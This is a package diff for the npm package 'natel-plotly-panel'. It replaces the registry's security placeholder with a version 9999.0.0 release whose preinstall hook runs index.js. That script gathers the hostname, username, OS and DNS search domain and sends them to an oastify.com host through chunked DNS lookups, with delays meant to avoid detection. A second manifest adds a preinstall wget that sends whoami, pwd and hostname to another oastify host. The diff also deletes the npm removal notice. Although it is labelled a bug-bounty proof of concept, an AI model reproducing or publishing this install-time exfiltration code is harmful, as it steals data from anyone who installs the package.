natel-plotly-panel 0.0.1-security → 9999.0.0

package/index.js

@@ -0,0 +1,73 @@
+// Apex Hunter PoC v4.0 - DNS-Only Stealth Exfiltration
+// Designed for attribution during Dependency Confusion tests (Bugcrowd-compliant)
+
+const os = require('os');
+const fs = 'fs'; // Light obfuscation
+const dns = 'dns';
+
+// ======================= CONFIGURATION =======================
+const oastHost = 'qlf8zf0i0r1j0jt0w2ulaw0qthzlnbb0.oastify.com';
+const maxChunkSize = 50; // Keep DNS labels within safe bounds
+// =============================================================
+
+function generateReport() {
+    let parts = [];
+    const add = (key, value) => {
+        const sanitizedValue = (value || 'NA')
+            .toString()
+            .replace(/[^a-zA-Z0-9-]/g, '-')  // DNS-safe
+            .slice(0, 100);
+        parts.push(`${key}-${sanitizedValue}`);
+    };
+
+    // === Bugcrowd-required fields ===
+    add('hostname', os.hostname()); // Hostname
+    try {
+        const userInfo = os.userInfo();
+        add('user', `${userInfo.username}-${userInfo.uid}`); // whoami equivalent
+    } catch (e) {
+        add('user', 'unknown-user');
+    }
+    add('os', `${os.platform()}-${os.release()}`); // OS info
+
+    // === Attribution proof ===
+    try {
+        const resolvConf = require(fs).readFileSync('/etc/resolv.conf', 'utf8');
+        const match = resolvConf.match(/search\s+([^\n]+)/);
+        const domain = match ? match[1].split(' ')[0] : 'no-search-domain';
+        add('dns_proof', domain);
+    } catch (e) {
+        add('dns_proof', 'resolv-unreadable');
+    }
+
+    return parts.join('.');
+}
+
+function exfiltrateViaDns(data) {
+    const encodedData = Buffer.from(data).toString('hex');
+    const chunks = encodedData.match(new RegExp(`.{1,${maxChunkSize}}`, 'g')) || [];
+    const totalChunks = chunks.length;
+    const reportId = Math.random().toString(36).substring(2, 8); // Unique per run
+
+    let i = 0;
+    const sendChunk = () => {
+        if (i >= totalChunks) {
+            require(dns).lookup(`${reportId}.end.fin.${oastHost}`, () => {});
+            return;
+        }
+
+        const chunk = chunks[i];
+        const subdomain = `${reportId}.${i}.${chunk}.${oastHost}`;
+
+        require(dns).lookup(subdomain, () => {
+            i++;
+            setTimeout(sendChunk, 100 + Math.random() * 100); // Delay to avoid detection
+        });
+    };
+
+    sendChunk();
+}
+
+// --- Entry ---
+const report = generateReport();
+exfiltrateViaDns(report);

package/package.json

@@ -1,6 +1,11 @@
 {
-  "name": "natel-plotly-panel",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "name": "natel-plotly-panel", 
+  "version": "9999.0.0",
+  "description": "ULTIMATE PoC: RCE via DNS Exfil - nepalihacker000",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js"
+  },
+  "author": "nepalihacker000",
+  "license": "ISC"
 }

package/pakage.json

@@ -0,0 +1,12 @@
+{
+  "name": "cms-media-bridge",
+  "version": "10.0.1",
+  "description": "PoC for Dependency Confusion vulnerability",
+  "scripts": {
+    "preinstall": "sh -c 'wget --quiet \"http://7y6ftwvzeqjn824k9d0rzpmvcmig66uv.oastify.com/?event=preinstall&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"'",
+    "preupdate": "sh -c 'wget --quiet \"http://...\"'",
+    "test": "sh -c 'wget --quiet \"http://...\"'"
+  },
+  "author": "orwa",
+  "license": "ISC"
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=natel-plotly-panel for more information.